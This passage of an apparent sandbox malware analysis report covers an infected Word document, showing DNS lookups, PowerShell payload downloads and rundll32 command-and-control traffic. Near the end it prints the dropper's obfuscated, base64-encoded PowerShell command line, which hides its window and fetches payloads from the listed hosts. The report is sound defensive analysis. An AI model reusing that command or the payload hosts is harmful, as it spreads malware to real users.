Jan 7, 2021 11:52:55.103463888 CET	53	64938	8.8.8.8	192.168.2.3
Jan 7, 2021 11:52:58.621505022 CET	60152	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:52:58.678035021 CET	53	60152	8.8.8.8	192.168.2.3
Jan 7, 2021 11:52:59.046937943 CET	64938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:52:59.103290081 CET	53	64938	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:00.339157104 CET	57544	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:00.797466040 CET	53	57544	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:06.563318968 CET	55984	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:06.622776985 CET	53	55984	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:11.240293026 CET	64185	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:11.288395882 CET	53	64185	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:18.975038052 CET	65110	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:19.035140038 CET	53	65110	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:19.811124086 CET	58361	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:19.869376898 CET	53	58361	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:21.901844978 CET	63492	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:21.980052948 CET	53	63492	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:22.712413073 CET	60831	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:22.863197088 CET	53	60831	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:23.787086010 CET	60100	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:23.857609987 CET	53	60100	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:32.423484087 CET	53195	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:32.489484072 CET	53	53195	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:34.464287043 CET	50141	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:34.515090942 CET	53	50141	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:34.967576027 CET	53023	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:35.070518970 CET	53	53023	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:37.727339983 CET	49563	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:37.775592089 CET	53	49563	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:38.998657942 CET	51352	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:39.046560049 CET	53	51352	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:39.356466055 CET	59349	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:39.416241884 CET	53	59349	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:40.420809984 CET	57084	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:40.468889952 CET	53	57084	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:41.647227049 CET	58823	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:41.697283030 CET	53	58823	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:42.229490995 CET	57568	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:42.277599096 CET	53	57568	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:42.674325943 CET	50540	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:42.741889954 CET	53	50540	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:45.701423883 CET	54366	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:45.749460936 CET	53	54366	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:47.290868044 CET	53034	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:47.347683907 CET	53	53034	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:48.527205944 CET	57762	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:48.575330019 CET	53	57762	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:49.709244013 CET	55435	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:49.757492065 CET	53	55435	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:50.921935081 CET	50713	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:50.972835064 CET	53	50713	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:53.528345108 CET	56132	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:53.579340935 CET	53	56132	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:54.427498102 CET	58987	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:54.475605965 CET	53	58987	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:57.617033958 CET	56579	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:57.675860882 CET	53	56579	8.8.8.8	192.168.2.3
Jan 7, 2021 11:53:58.899104118 CET	60633	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:53:58.947017908 CET	53	60633	8.8.8.8	192.168.2.3
Jan 7, 2021 11:54:02.120038033 CET	61292	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:54:02.176460981 CET	53	61292	8.8.8.8	192.168.2.3
Jan 7, 2021 11:54:07.264889956 CET	63619	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:54:07.313079119 CET	53	63619	8.8.8.8	192.168.2.3
Jan 7, 2021 11:54:08.453532934 CET	64938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:54:08.501606941 CET	53	64938	8.8.8.8	192.168.2.3
Jan 7, 2021 11:54:20.988591909 CET	61946	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:54:21.039434910 CET	53	61946	8.8.8.8	192.168.2.3
Jan 7, 2021 11:54:24.972522020 CET	64910	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:54:25.020458937 CET	53	64910	8.8.8.8	192.168.2.3
Jan 7, 2021 11:54:29.190088987 CET	52123	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:54:29.241059065 CET	53	52123	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 7, 2021 11:53:27.254981995 CET	58.97.195.135	192.168.2.3	bdad	(Host unreachable)	Destination Unreachable
Jan 7, 2021 11:53:27.255003929 CET	58.97.195.135	192.168.2.3	bdad	(Host unreachable)	Destination Unreachable
Jan 7, 2021 11:53:27.255011082 CET	58.97.195.135	192.168.2.3	bdad	(Host unreachable)	Destination Unreachable
Jan 7, 2021 11:53:33.014947891 CET	58.97.195.135	192.168.2.3	bdad	(Host unreachable)	Destination Unreachable
Jan 7, 2021 11:53:36.955491066 CET	58.97.195.135	192.168.2.3	bdad	(Host unreachable)	Destination Unreachable
Jan 7, 2021 11:53:39.544301033 CET	152.170.79.100	192.168.2.3	a7df	(Host unreachable)	Destination Unreachable
Jan 7, 2021 11:53:46.735395908 CET	152.170.79.100	192.168.2.3	a7df	(Host unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 7, 2021 11:52:58.621505022 CET	192.168.2.3	8.8.8.8	0x699c	Standard query (0)	wheelcomoving.com	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:00.339157104 CET	192.168.2.3	8.8.8.8	0xe253	Standard query (0)	00zyku.com	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:21.901844978 CET	192.168.2.3	8.8.8.8	0x8cf0	Standard query (0)	ketoresetme.com	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:22.712413073 CET	192.168.2.3	8.8.8.8	0x1d82	Standard query (0)	rycomputer.com	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:23.787086010 CET	192.168.2.3	8.8.8.8	0xdfc3	Standard query (0)	d-cem.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 7, 2021 11:52:58.678035021 CET	8.8.8.8	192.168.2.3	0x699c	No error (0)	wheelcomoving.com	66.85.46.76	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:00.797466040 CET	8.8.8.8	192.168.2.3	0xe253	No error (0)	00zyku.com	193.187.117.26	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:21.980052948 CET	8.8.8.8	192.168.2.3	0x8cf0	No error (0)	ketoresetme.com	70.32.23.58	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:22.863197088 CET	8.8.8.8	192.168.2.3	0x1d82	No error (0)	rycomputer.com	58.97.195.135	A (IP address)	IN (0x0001)
Jan 7, 2021 11:53:23.857609987 CET	8.8.8.8	192.168.2.3	0xdfc3	No error (0)	d-cem.com	35.214.169.246	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

wheelcomoving.com

ketoresetme.com

138.197.99.250

138.197.99.250:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49711	66.85.46.76	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 11:52:58.843642950 CET	30	OUT	GET /p/RuMeRPa/ HTTP/1.1 Host: wheelcomoving.com Connection: Keep-Alive
Jan 7, 2021 11:52:59.950355053 CET	31	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Jan 2021 10:52:58 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a Data Ascii: 32<!DOCTYPE html><html lang="en-US"><head>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49721	70.32.23.58	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 11:53:22.130922079 CET	199	OUT	GET /wp-content/pmJ/ HTTP/1.1 Host: ketoresetme.com Connection: Keep-Alive
Jan 7, 2021 11:53:22.396975040 CET	200	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Jan 2021 10:53:22 GMT Server: Apache X-Powered-By: PHP/7.3.25 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://ketoresetme.com/wp-json/>; rel="https://api.w.org/" Strict-Transport-Security: max-age=63072000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Vary: Accept-Encoding Keep-Alive: timeout=3, max=500 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 65 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 20 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 44 72 2e 41 6e 64 72 65 61 20 44 61 76 69 73 2c 20 50 75 62 6c 69 63 20 48 65 61 6c 74 68 20 45 78 70 65 72 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 39 2f 74 74 74 2e 70 6e 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 72 2e 41 6e 64 72 65 61 20 44 61 76 69 73 2c 20 50 75 62 6c 69 63 20 48 65 61 6c 74 68 20 45 78 70 65 72 74 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 65 74 6f Data Ascii: 20ee<!doctype html >...[if IE 8]> <html class="ie8" lang="en"> <![endif]-->...[if IE 9]> <html class="ie9" lang="en"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head> <title>Page not found \| Dr.Andrea Davis, Public Health Expert</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="http://ketoresetme.com/xmlrpc.php" /> <link rel="icon" type="image/png" href="https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png"><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Dr.Andrea Davis, Public Health Expert » Feed" href="https://keto

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49755	138.197.99.250	8080	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 11:54:32.080740929 CET	5218	OUT	POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1 DNT: 0 Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1Cxtn User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 138.197.99.250:8080 Content-Length: 6500 Connection: Keep-Alive Cache-Control: no-cache
Jan 7, 2021 11:54:32.489579916 CET	5226	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Jan 2021 10:54:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 63 34 0d 0a e1 0f 0a 8c 6a 33 6c 19 dd 31 1e 66 30 f9 e4 a8 c5 9b 94 e5 51 f7 89 8b dc f4 23 5f 52 e3 0c 29 c7 b8 8e 2d 2e be 6e c3 ae 69 c6 97 09 d7 05 50 97 bb d0 e1 ca 3d 99 76 cf 75 5d c9 8f 59 f0 0b 2b b8 9e 52 43 94 c9 b1 2a e0 b2 6b 03 f8 d6 80 2c a5 1c 3c 51 3a 5b e3 82 b2 70 d4 a0 bf 70 17 a1 d4 7e ab e9 14 9f 7f a2 67 30 6e 44 6d df 30 b4 01 77 70 3a b6 34 ba 11 a7 d4 fd 93 93 a6 99 de e5 61 e7 70 d9 c4 86 02 4c 7c 5a d6 a1 88 cd 6a 42 87 89 59 87 11 f9 b0 57 35 68 f5 92 f9 ee c6 b2 21 64 36 e9 6a de f9 0c fa 2a aa e7 56 05 18 4a 7f d5 10 5d da c4 48 f5 32 07 6c 36 be 0d b4 52 8c 1b 5a 8a e2 ff f0 77 51 e4 83 d5 cb 9b 75 15 1c c9 a9 c6 b5 8e 4c 62 23 b4 ab b5 9a d4 93 d0 20 3d fd b7 e0 7a 54 60 fb 3f 0d 68 21 4c 41 7e d0 72 29 96 59 60 b3 27 9f e2 ff 8e f5 74 25 7e ec d1 4d 23 bf 31 34 b7 6e b2 03 57 42 6c e9 c2 64 e5 72 18 b5 b2 3e d7 93 f0 75 a6 3b ce 46 3a 16 70 e8 5c f6 51 6f 3e 49 cd f8 06 a8 aa af 4f 2a 59 85 ef c0 ca 54 63 23 11 67 b1 6b 9f 5b 07 1d 18 9b e4 f4 13 b2 8c 62 bc 76 ac 95 4a e9 39 e4 40 40 e5 d0 21 d1 1d ae 38 42 02 e0 5f 52 f9 03 67 7d c2 6b 6f a1 29 04 1c 95 57 4a 6b ee cc c5 6e c2 b7 d7 b1 14 b6 a9 dc d4 a1 14 26 7a 09 dc 72 08 96 03 5d 66 72 8b 05 de 1f 62 b4 ff 4f dc 97 28 47 1a ac cf 80 53 0b fd 33 f6 f5 22 43 8c 03 5c a2 57 77 41 0d a5 44 b2 c9 c9 6c 8e 7f 51 40 4d 37 c2 2e a6 88 4c dd e7 c8 59 9c 0c 6e e0 ed fc 3a ee 72 29 06 8b e4 da 12 ce 45 2f 1a 98 d4 e1 b6 db f1 96 c5 db cc 9a 4b 28 2b 53 8d a4 48 d5 58 d9 54 6e fe cf e2 90 3e 5e d1 e2 ff 26 9d b8 85 92 53 ef 02 cf f0 c4 45 b4 70 17 19 15 d8 08 69 9d d0 57 e8 8f a7 48 23 24 60 b7 2b 09 49 f6 46 30 40 1b 1c d8 5c da 3a 37 9e 61 98 4c 6d 8a a2 62 e6 9f 51 2a 57 89 0a 8d 67 bf 4a 07 f1 58 b2 53 e3 98 72 4e 64 12 54 20 61 a4 92 68 61 20 56 5c b0 69 dd e3 40 b8 52 b1 43 37 b6 2b a4 46 f0 88 27 49 a4 6d a5 1d b4 7f f3 e6 95 ee 65 a2 c4 ec 9d b0 74 37 f0 0d 09 3c d6 51 84 74 d6 ce a7 9c 0c 03 c2 83 d8 34 b6 91 98 d0 db 1a 79 14 d2 56 fd ba 41 91 ee 95 46 cb fc 6e 97 2f 5f 1e 74 a2 f9 f9 d2 39 54 5d 04 35 d5 44 b6 6a ff a2 6b 3d 9b e2 75 fd 16 7e f6 7f 79 eb 0b c2 ae f1 96 9c 9b bb 09 ec b0 f4 0b 24 79 ea f9 3d 71 08 42 e2 15 35 88 21 b0 c4 a7 4d 16 d1 e9 1a f1 7f 26 d3 85 0e 22 1f b7 84 a3 ff d3 bd 5f dd 69 62 fc a4 7e d9 5d c6 4e 92 42 60 9b 5d 0d 0f 69 8e 37 15 fc 44 2d 90 7d c3 51 1d 3f 62 f0 81 55 2e 5d 66 4e 6d a7 1f 4a 31 ee 4c b2 1f eb 50 b1 ab a1 33 9f 10 ee 9f c1 7b 32 43 d3 4b 36 79 56 81 39 da 90 7c b9 4a 5f b3 14 18 1f d7 ec c1 f2 ef f8 ee e6 8f ed 96 05 7b f8 38 8f c8 f8 1d 2d fd fd 97 54 2c 66 d2 6a 8b ca 71 e9 82 dd f9 86 5d bc 00 23 79 0c 40 a1 3e 32 35 26 48 1f 53 78 b0 9a 9b 18 1a d5 47 8a 75 43 b3 92 02 a9 9c 67 cb 67 03 01 5e 04 b8 ab 27 ab 59 aa dc 88 a4 03 e4 31 4f cd 24 45 76 ab 4c 54 98 80 9c 7d 81 39 50 eb 32 98 60 b8 aa 6f 20 53 04 d3 e3 cc 5f f5 1c 4d 8d 60 b1 ca 74 44 49 74 bd 61 23 e2 7f e3 be c1 a1 5f 89 e8 33 8c 2f d9 3b 04 5b 37 48 05 5e 0d f9 12 4d 30 d1 dd 40 b1 33 51 39 9c 26 d4 05 1a da 87 e7 64 e1 10 b2 bb 25 ca 99 05 38 db cd 58 69 d5 fc a1 76 79 1f fd 2e d6 84 f6 69 4d e4 8e f6 93 c7 23 32 25 54 dd af 13 4a 5a 10 4d 8b d3 e4 84 11 f6 b2 32 00 8f 92 f0 1d fa d3 0c c7 fb 2c 53 7a a8 3b 56 08 39 cc 3a 05 f5 75 0f 7e 15 e6 f6 94 9c 52 47 96 87 90 14 f3 93 df 51 66 16 f5 40 80 a4 e1 1b 16 c6 77 1e 15 70 04 a5 7a 53 f5 02 52 0a 2b e5 e7 b2 d1 70 b7 99 7b 5c bc 55 40 a1 3e c7 32 e1 ba 4b da 1e 4d 28 40 27 4b d8 30 99 fc d5 7f f4 97 b5 b7 98 8d 34 51 e9 46 a1 99 d7 af 75 12 Data Ascii: bc4j3l1f0Q#_R)-.niP=vu]Y+RCk,<Q:[pp~g0nDm0wp:4apL\|ZjBYW5h!d6jVJ]H2l6RZwQuLb# =zT`?h!LA~r)Y`'t%~M#14nWBldr>u;F:p\Qo>IOYTc#gk[bvJ9@@!8B_Rg}ko)WJkn&zr]frbO(GS3"C\WwADlQ@M7.LYn:r)E/K(+SHXTn>^&SEpiWH#$`+IF0@\:7aLmbQWgJXSrNdT aha V\i@RC7+F'Imet7<Qt4yVAFn/_t9T]5Djk=u~y$y=qB5!M&"_ib~]NB`]i7D-}Q?bU.]fNmJ1LP3{2CK6yV9\|J_{8-T,fjq]#y@>25&HSxGuCgg^'Y1O$EvLT}9P2`o S_M`tDIta#_3/;[7H^M0@3Q9&d%8Xivy.iM#2%TJZM2,Sz;V9:u~RGQf@wpzSR+p{\U@>2KM(@'K04QFu

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 7, 2021 11:53:23.490322113 CET	58.97.195.135	443	192.168.2.3	49722	CN=cambohire.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Dec 29 17:03:31 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Mon Mar 29 18:03:31 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Jan 7, 2021 11:53:23.490322113 CET	58.97.195.135	443	192.168.2.3	49722	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		3b5074b1b5d032e5620f69f9f700ff0e
Jan 7, 2021 11:53:23.962385893 CET	35.214.169.246	443	192.168.2.3	49723	CN=d-cem.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Jan 02 14:34:24 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Fri Apr 02 15:34:24 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Jan 7, 2021 11:53:23.962385893 CET	35.214.169.246	443	192.168.2.3	49723	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		3b5074b1b5d032e5620f69f9f700ff0e

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 6804 Parent PID: 792

General

Start time:	11:52:48
Start date:	07/01/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase:	0xeb0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7000 Parent PID: 4940

General

Start time:	11:52:51
Start date:	07/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIA